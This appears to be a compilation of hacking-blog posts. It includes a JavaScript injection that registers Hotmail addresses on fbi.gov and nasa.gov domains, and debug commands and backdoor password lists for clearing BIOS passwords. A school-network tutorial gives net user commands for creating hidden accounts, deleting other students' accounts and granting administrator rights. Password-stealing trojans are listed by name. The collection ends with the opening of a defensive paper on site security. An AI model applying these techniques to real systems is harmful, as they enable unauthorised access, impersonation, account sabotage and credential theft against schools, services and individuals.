• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic


Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP

The New Hack..........................

Get ur unique msn account

//Not actice now
this thread will be erased in some days

try something new www.deadfake.com annms mail




Popular

* Get your Own Unique msn account @"whateveryouwant"


Get your Own Unique msn account @"whateveryouwant"


There are two ways ..

the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033

and continue registering from here .. this is the easy way ...

Now the ELITE waY



1. Goto http://get.live.com/getlive/overview to start registering your windows live account.

2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.

3.Copy the following javascript injection code:


javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="md5this.");r(a = new Array("hotmail.com","fbi.gov","nasa.gov",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*md5this.com*/,d+"nl")); for (i=0;i



4. Paste the code in your address bar (you know, that thing you normally type www.sainathgupta.tk .

5. Hit enter, if all went well it should show a message box telling you "Success - additional domains added!".

6.Now you can select a multitude of domains, fill out the form and you are ready to go!

Now you have a New msn account to scare your friends out

play with it ... enter a @whatever you want chat with people .. scare them



beyond that


javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="toxic.");r(a = new Array("hotmail.com","csthis.com","nasa.gov","fbi.gov","iknowwhatyoudidlastsummer.info",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*csthis.com*/,d+"nl")); for (i=0;i



and here is more .....



https://account.live.com/MessagePage.aspx?lc=1033&message=SIconfirmed&param=%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A

Hacking Password Protected Websites

warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

Find Who is invisible in yahoo msnger

Find who is Invisible on Yahoo messenger
Just go to

http://www.invisible.ir

and enter victims Yahoo! ID… Click go and you are done!
credit : site contributer :

it works !!

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:

Find who is Invisible on Yahoo messenger - The Ethical Hacking 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.

Find who is Invisible on Yahoo messenger - The Ethical Hacking


Alternate Method:

Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.

Note:Some people use softwares like buddy spy to check who is invisible.I DONT RECOMMEND you to use such third party softwares as they can expose your Pc to hackers by sending your personal information and can even steal information from your Pc.So avoid such softwares and instead use the simple tricks given above.

If you have any queries or would like to make some useful contribution to this topic feel free to drop a line in the comments section.

Some Damn Things

Anonymizers and Remailers !! What n How


Anonymizers are online services that eliminate the trail of information that you leave behind, whilst surfing, so that your online activities cannot be traced back to you. The anonymizers vary in sophistication depending on the level of security and number of features that you require. Some anonymizers require the use of client software and others only require that you log onto their website before browsing other sites*.


How do Anonymizers work?



You essentially surf the Web through the anonymizer site, going to that site first and then routing all your pages from there. When you send a page request through the anonymizer, it acts like a super-proxy server, stripping off the header of each data packet, thus making your request anonymous. The requested page is then fed through the anonymizer back to your Web browser**.



In order to avoid being tracked, one can use an anonymous proxy to surf the web. An anonymous proxy makes sure your IP address does not get stored on the web server logs. Web servers log every ?GET? request made, together with date, hour, and IP. But if you are accessing the Internet through a proxy server, then the IP of the proxy is logged and not yours.
In case you do not go through an anonymous proxy, then you are actually risking vital information that belongs to you. For example, a hacker can easily find out your IP Address, your web browser, your Operating System and even the previous URL that you have visited. You can also be easily located geographically (provided one has the necessary software tools) because people can find out a whole lot of things that give your location. Like your hostname, your continent, your country, your city and even your Internet Service Provider.
Consider the scenario where a hacker gets access to your computer, he can find out your name, email address, telephone number, various user ID's and passwords, details about software you use and your preferences, locations of files and folders, the search strings that you used and literally hundreds of other personal things. All this information is stored in files like SYSTEM.ini, USER.dat, SYSTEM.dat etc. One very important file is the nsform??.TMP which stores all the data inside every Netscape form you've ever submitted, with and without SSL, when the submission failed or was cancelled.


What are Re-mailers?



Anonymous Re-mailers are services used to send e-mail messages, so that the recipient of the e-mail cannot determine the identity of the sender. Re-mailers strip off header information leading to the identity of the sender and often route a message through a chain of re-mailers before reaching the recipient. Many re-mailers also include some sort of message based encryption. Re-mailers are commonly used to protect the anonymity if the sender from the recipient, to prevent eavesdropping by a third party, or to post anonymously to newsgroups*.

How do Re-mailers Work?



An anonymous re-mailer is simply a computer connected to the Internet that forwards electronic mail or files to other addresses on the network. It also strips off the "header" part of the messages, which shows where they came from and who sent them. All the receiver can tell about a message's origin is that it passed through the re-mailer. Some re-mailers also allocate each sender an "anonymous ID", rather like a PO Box number, which it stores with the sender's address so that any replies reach them.***


All re-mailers are fairly effective at what they do and some even take an extra step and add encryption to all outgoing messages. In order to view header information sent via email messages in Outlook Express, select a message in your inbox, then select File | Properties | Details.
To view header information in m*c*s*t Outlook, right-click a message in your inbox and select Options; the header information is displayed in the Internet Headers area of the Message Options dialog box.

Anonymous re-mailers were invented by security experts interested to know whether it was possible to send a message on the Internet which could not be traced back to its source. As soon as the first ones were built, though, people found a more pragmatic use for them: to send messages to bulletin boards about subjects so sensitive that they did not want their names known.

Clear BIOS Password, All tricks !




**** New Trick **** :

At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)

A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q

Basic BIOS password crack - works 9.9 times out of ten

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.



Accessing information on the hard disk



When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.



Standard BIOS backdoor passwords


The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.



Flashing BIOS via software


If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.


Flashing BIOS via hardware


If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.


Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.

To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.

Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.


Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)


Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26


Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.


Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd


Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13



Replacing the chip


If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.


Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .



Key Disk for Toshiba laptops


Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.


Key protected cases


A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

That's all.

Clear Cmos, jumper.That is the way how I solve problem when customer forgets password.


More

There are a few different ways to reset the cmos, here's a few:

1. there are many default common passwords,
such as:

At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)

For Award BIOS' try these backdoor passwords:

AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx

For AMI BIOS' try these backdoor passwords:

AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO


For PHOENIX BIOS' try this backdoor password:

phoenix

there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)


2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.

3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.

4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)

5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.

6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:

http://www.11a.nu/ibios.htm

http://natan.zejn.si/rempass.html

Good reading:
http://www.astalavista.com/library/...ios_hacking.txt


http://www.virtualplastic.net/html/misc_bios.html



Hacking your School, College


getting over the blocked sites

u can try google translator .. or one proxy which i found intresting was greenpips.com try that or . try this http://64.233.179.104/translate_c?hl=de&ie=UTF-8&oe=UTF-8&langpair=de%7Cen&u=http://www.your website.com/ change the last part to the website you like to access

contributed by
Muhajir.K.M

Hacking at school

This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.


There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!


How to get it all moving


An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do, they just can't do anything much about it.

First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write

command.com

and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you;)


Bypassing that pesky web filtering


Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.

in your command prompt, type

ping hackthissite.org

or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!

For example: http://197.57.189.10 etc.

Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:

1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.

2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.

3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content:)



Sending messages out over the network



Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is h4x0r3d"

*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.



Adding/modifying user accounts



Now that you have a command prompt, you can add a new user (ie yourself) like so

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them:)

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them:)

Let's give you admin priveleges:)

C:>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.

I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)

Some Tools Name

Hackers tools a reference ! BEWARE !!

AAh!!

The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.

They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .

Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files

Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer

Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc

JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger

Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features

Tro messenger

The big Boss , used with Yahoo messenger lets u take over victims Pc


Many more exists,will be disclosing all of them
Even u can contribute

Improving the Security of Your Site by Breaking Into it

Introduction

------------



Every day, all over the world, computer networks and hosts are being

broken into. The level of sophistication of these attacks varies

widely; while it is generally believed that most break-ins succeed due

to weak passwords, there are still a large number of intrusions that use

more advanced techniques to break in. Less is known about the latter

types of break-ins, because by their very nature they are much harder to

detect.



-----



CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .

Purdue. Sun. You name it, we've seen it broken into. Anything that is

on the Internet (and many that isn't) seems to be fairly easy game. Are

these targets unusual? What happened?



Fade to...



A young boy, with greasy blonde hair, sitting in a dark room. The room

is illuminated only by the luminescense of the C64's 40 character

screen. Taking another long drag from his Benson and Hedges cigarette,

the weary system cracker telnets to the next faceless ".mil" site on his

hit list. "guest -- guest", "root -- root", and "system -- manager" all

fail. No matter. He has all night... he pencils the host off of his

list, and tiredly types in the next potential victim...



This seems to be the popular image of a system cracker. Young,

inexperienced, and possessing vast quantities of time to waste, to get

into just one more system. However, there is a far more dangerous type

of system cracker out there. One who knows the ins and outs of the

latest security auditing and cracking tools, who can modify them for

specific attacks, and who can write his/her own programs. One who not

only reads about the latest security holes, but also personally

discovers bugs and vulnerabilities. A deadly creature that can both

strike poisonously and hide its tracks without a whisper or hint of a

trail. The uebercracker is here.



-----



Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's

uebermensch, or, literally translated into English, "over man."

Nietzsche used the term not to refer to a comic book superman, but

instead a man who had gone beyond the incompetence, pettiness, and

weakness of the everyday man. The uebercracker is therefore the system

cracker who has gone beyond simple cookbook methods of breaking into

systems. An uebercracker is not usually motivated to perform random

acts of violence. Targets are not arbitrary -- there is a purpose,

whether it be personal monetary gain, a hit and run raid for

information, or a challenge to strike a major or prestigious site or

net.personality. An uebercracker is hard to detect, harder to stop, and

hardest to keep out of your site for good.



Overview

--------



In this paper we will take an unusual approach to system security.

Instead of merely saying that something is a problem, we will look

through the eyes of a potential intruder, and show _why_ it is one. We

will illustrate that even seemingly harmless network services can become

valuable tools in the search for weak points of a system, even when

these services are operating exactly as they are intended to.



In an effort to shed some light on how more advanced intrusions occur,

this paper outlines various mechanisms that crackers have actually used

to obtain access to systems and, in addition, some techniques we either

suspect intruders of using, or that we have used ourselves in tests or

in friendly/authorized environments.



Our motivation for writing this paper is that system administrators are

often unaware of the dangers presented by anything beyond the most

trivial attacks. While it is widely known that the proper level of

protection depends on what has to be protected, many sites appear to

lack the resources to assess what level of host and network security is

adequate. By showing what intruders can do to gain access to a remote

site, we are trying to help system administrators to make _informed_

decisions on how to secure their site -- or not. We will limit the

discussion to techniques that can give a remote intruder access to a

(possibly non-interactive) shell process on a UNIX host. Once this is

achieved, the details of obtaining root privilege are beyond the scope

of this work -- we consider them too site-dependent and, in many cases,

too trivial to merit much discussion.



We want to stress that we will not merely run down a list of bugs or

security holes -- there will always be new ones for a potential attacker

to exploit. The purpose of this paper is to try to get the reader to

look at her or his system in a new way -- one that will hopefully afford

him or her the opportunity to _understand_ how their system can be

compromised, and how.



We would also like to reiterate to the reader that the purpose of this

paper is to show you how to test the security of your own site, not how

to break into other people's systems. The intrusion techniques we

illustrate here will often leave traces in your system auditing logs --

it might be constructive to examine them after trying some of these

attacks out, to see what a real attack might look like. Certainly other

sites and system administrators will take a very dim view of your

activities if you decide to use their hosts for security testing without

advance authorization; indeed, it is quite possible that legal action

may be pursued against you if they perceive it as an attack.



There are four main parts to the paper. The first part is the

introduction and overview. The second part attempts to give the reader

a feel for what it is like to be an intruder and how to go from knowing

nothing about a system to compromising its security. This section goes

over actual techniques to gain information and entrance and covers basic

strategies such as exploiting trust and abusing improperly configured

basic network services (ftp, mail, tftp, etc.) It also discusses

slightly more advanced topics, such as NIS and NFS, as well as various

common bugs and configuration problems that are somewhat more OS or

system specific. Defensive strategies against each of the various

attacks are also covered here.



The third section deals with trust: how the security of one system

depends on the integrity of other systems. Trust is the most complex

subject in this paper, and for the sake of brevity we will limit the

discussion to clients in disguise.



The fourth section covers the basic steps that a system administrator

may take to protect her or his system. Most of the methods presented

here are merely common sense, but they are often ignored in practice --

one of our goals is to show just how dangerous it can be to ignore basic

security practices.



Case studies, pointers to security-related information, and software are

described in the appendices at the end of the paper.



While exploring the methods and strategies discussed in this paper we we

wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in

shell, perl, expect and C, it examines a remote host or set of hosts and

gathers as much information as possible by remotely probing NIS, finger,

NFS, ftp and tftp, rexd, and other services. This information includes

the presence of various network information services as well as

potential security flaws -- usually in the form of incorrectly setup or

configured network services, well-known bugs in system or network

utilities, or poor or ignorant policy decisions. It then can either

report on this data or use an expert system to further investigate any

potential security problems. While SATAN doesn't use all of the methods

that we discuss in the paper, it has succeeded with ominous regularity

in finding serious holes in the security of Internet sites. It will be

posted and made available via anonymous ftp when completed; Appendix A

covers its salient features.



Note that it isn't possible to cover all possible methods of breaking

into systems in a single paper. Indeed, we won't cover two of the most

effective methods of breaking into hosts: social engineering and

password cracking. The latter method is so effective, however, that

several of the strategies presented here are geared towards acquiring

password files. In addition, while windowing systems (X, OpenWindows,

etc.) can provide a fertile ground for exploitation, we simply don't

know many methods that are used to break into remote systems. Many

system crackers use non-bitmapped terminals which can prevent them from

using some of the more interesting methods to exploit windowing systems

effectively (although being able to monitor the victim's keyboard is

often sufficient to capture passwords). Finally, while worms, viruses,

trojan horses, and other malware are very interesting, they are not

common (on UNIX systems) and probably will use similar techniques to the

ones we describe in this paper as individual parts to their attack

strategy.



Gaining Information

-------------------



Let us assume that you are the head system administrator of Victim

Incorporated's network of UNIX workstations. In an effort to secure

your machines, you ask a friendly system administrator from a nearby

site (evil.com) to give you an account on one of her machines so that

you can look at your own system's security from the outside.



What should you do? First, try to gather information about your

